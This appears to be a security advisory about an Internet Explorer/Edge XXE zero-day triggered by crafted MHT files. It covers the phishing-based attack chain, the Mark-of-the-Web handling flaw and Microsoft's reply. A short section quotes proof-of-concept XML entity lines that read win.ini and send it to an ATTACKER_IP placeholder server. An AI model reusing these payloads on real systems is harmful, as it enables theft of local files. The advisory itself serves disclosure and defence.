Internet Explorer/Edge XXE (XML External Entity) Zero-Day Vulnerability

A Zero-day vulnerability has been discovered in Internet Explorer that can allow attackers to steal files from the Windows systems. The vulnerability resides in the way Internet Explorer processes MHT(MIME HTML web archive) files and can be easily exploited by tricking users into opening a specially crafted MHT file. MHT is a Web page archive file format and is not used by modern browsers anymore. Modern browsers instead use newer standard HTML file format, but still support processing the old MHT format.

Technical Details:
XXE injection works by exploiting XML parser via an improperly restricted XML external entity reference or misconfigured document type definition. An attacker can use a malicious XML file with external entity reference that abuses the ‘file://’ protocol to access local files, or ‘http://’ to access files on web servers.

A Proof-of-concept (PoC) exploit code for this vulnerability has already been published and is available. A typical malicious XML file will look like this:

'<!ENTITY % data SYSTEM "c:\windows\win.ini">\n'
'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'

'<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">\n'

'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://'+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'


Anatomy of attack:
The attacker starts a web server and hosts the malicious XML file on it. The attacker then uses external attack vectors, such as socially engineered spam email attachment or phishing to convince the victim to download the malicious MHT file. By default, all versions of Windows use IE to open MHT files. As soon as the malicious MHT file is opened in the IE browser, the external entity reference via ‘http://’ is abused. The malicious XML file on the attacker’s web server is parsed and local files mentioned in malicious XML from victim’s machine are ex-filtrated. A typical malicious MHT file would look like this :

The contents of the files that the attacker referenced via the malicious XML are sent back to the attacker’s server as shown in the picture below,

Culprit Internet Explorer OR Microsoft Edge?
According to the security analysts at ACROS,  it is an ‘undocumented security feature’ in Edge that clashes with IE’s capability to correctly read the mark of the web (MOTW) flag applied to files downloaded from the Internet. If the file is downloaded via IE browser and then opened, IE correctly identifies the file as untrusted and does not allow it to make the request to the remote server.

However, if the file is downloaded via Edge, then IE browser incorrectly identifies the file as trusted and allows it to make the request to the remote server. This happens as the permissions for malicious MHT file downloaded with Internet Explorer are different from those downloaded by Edge. Also, mark of the web(MOTW) information for the malicious file downloaded via Edge is stored in the data stream due to which Internet Explorer faces an error while trying to read it. This results in IE browser ignoring the error and considering the file as a regular local file.

Below are the differences in security features for the file downloaded via IE and Edge. Microsoft Edge has added two entries to the downloaded MHT file’s AC.

File Permissions downloaded with Microsoft Edge        File Permissions downloaded with IE

Microsoft Internet Explorer v11 with latest patches applied has been tested positive for this vulnerability.

It is important to note that XXE vulnerability only puts Microsoft Edge users at risk. Malicious files downloaded via Edge and then opened in Microsoft Internet Explorer makes the exploitation successful. However, security analysts at ACROS claim that the attackers can also exploit the vulnerability by just opening the malicious file directly from Edge.

Successful exploitation of this vulnerability could allow an attacker to gain access to sensitive files on the user’s system and gain remote access to information on locally installed programs. This can be used to execute more attacks or launch more payloads.

As of now, Microsoft has not released any fix for this vulnerability. Microsoft has considered fixing this issue in a future version of this product or service.

According to Microsoft,

Internet Explorer alone does not permit this type of malicious behaviour. An attacker must trick or convince a user into downloading a malicious document through a socially engineered scheme, for example a spam email attachment or phishing campaign that triggers a download. The file must then be opened with the browser. To guard against this scheme, practice safe computing habits online, such as avoid downloading and opening untrusted files from the Internet.

In addition, Microsoft added

We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case.